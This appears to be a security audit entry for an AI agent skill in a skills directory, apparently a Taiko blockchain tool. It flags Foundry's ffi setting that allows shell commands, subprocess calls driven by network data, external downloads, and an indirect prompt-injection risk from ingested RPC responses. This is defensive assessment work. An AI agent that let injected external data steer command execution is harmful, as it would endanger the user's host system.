The Agent Skills Directory

[COMMAND_EXECUTION]: The foundry.toml configuration file in the project template enables ffi = true. This setting allows the Foundry vm.ffi cheatcode, which permits Solidity scripts and tests to execute arbitrary shell commands on the host machine. This represents a significant security risk as it bypasses the EVM sandbox.
[COMMAND_EXECUTION]: Python utility scripts calc_blockhash.py and verify_signal.py use the subprocess module to execute the cast CLI tool. This pattern involves spawning external processes based on potentially untrusted network data.
[EXTERNAL_DOWNLOADS]: The skill's project template and instructions recommend downloading external code from GitHub repositories (foundry-rs/forge-std, OpenZeppelin/openzeppelin-contracts) using the forge install command.
[PROMPT_INJECTION]: The skill is susceptible to indirect prompt injection. 1. Ingestion points: External RPC responses in calc_blockhash.py and verify_signal.py. 2. Boundary markers: Absent. 3. Capability inventory: subprocess calls in Python scripts and ffi enabled in foundry.toml. 4. Sanitization: Present (hex-validation for subprocess inputs). The ingestion of external data combined with command execution capabilities creates a risk surface where malicious blockchain data could attempt to influence system-level agent operations.

taiko